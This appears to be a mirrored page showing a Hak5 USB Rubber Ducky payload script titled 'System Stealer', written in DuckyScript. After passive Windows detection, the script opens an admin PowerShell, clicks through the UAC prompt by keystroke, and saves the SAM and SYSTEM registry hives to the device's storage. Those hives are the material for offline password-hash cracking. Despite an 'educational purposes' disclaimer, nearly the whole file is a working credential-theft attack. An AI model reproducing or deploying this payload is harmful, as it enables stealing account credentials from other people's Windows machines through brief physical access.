Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/System-Stealer/payload.txt
2968 views
1
REM TITLE System Stealer

2
REM AUTHOR mavisinator30001

3
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both

4
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!

5
REM DISCLAIMER This is for educational purposes ONLY

6
DELAY 1000

7
ATTACKMODE HID STORAGE

8
EXTENSION PASSIVE_WINDOWS_DETECT

9
    REM VERSION 1.1

10
    REM AUTHOR: Korben

11


12
    REM_BLOCK DOCUMENTATION

13
        Windows fully passive OS Detection and passive Detect Ready

14
        Includes its own passive detect ready.

15
        Does not require additional extensions.

16


17
        USAGE:

18
            Extension runs inline (here)

19
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

20
            boot delay

21
            $_OS will be set to WINDOWS or NOT_WINDOWS

22
            See end of payload for usage within payload

23
    END_REM

24


25
    REM CONFIGURATION:

26
    DEFINE #MAX_WAIT 150

27
    DEFINE #CHECK_INTERVAL 20

28
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

29
    DEFINE #NOT_WINDOWS 7

30


31
    $_OS = #NOT_WINDOWS

32


33
    VAR $MAX_TRIES = #MAX_WAIT

34
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

35
        DELAY #CHECK_INTERVAL

36
        $MAX_TRIES = ($MAX_TRIES - 1)

37
    END_WHILE

38
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

39
        $_OS = WINDOWS

40
    END_IF

41


42
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION

43
        IF ($_OS == WINDOWS) THEN

44
            STRING HELLO WINDOWS!

45
        ELSE

46
            STRING HELLO WORLD!

47
        END_IF

48
    END_REM

49
END_EXTENSION

50
REM Change $DRIVELABEL to the storage label of your duck

51
DEFINE #DRIVELABEL DUCKY

52
IF ($_OS == WINDOWS) THEN

53
    GUI r

54
    DELAY 500

55
    STRING powershell

56
    DELAY 1000

57
    CTRL-SHIFT-ENTER

58
    DELAY 750

59
    LEFT

60
    ENTER

61
    DELAY 1000

62
    STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter

63
    DELAY 250

64
    STRINGLN reg save HKLM\sam $DriveLetter/sam.save

65
    WAIT_FOR_STORAGE_ACTIVITY

66
    WAIT_FOR_STORAGE_INACTIVITY

67
    STRINGLN reg save HKLM\system $DriveLetter/system.save

68
    WAIT_FOR_STORAGE_ACTIVITY

69
    WAIT_FOR_STORAGE_INACTIVITY

70
    ALT F4

71
ELSE

72
    ATTACKMODE OFF

73
    STOP_PAYLOAD

74
END_IF

75


76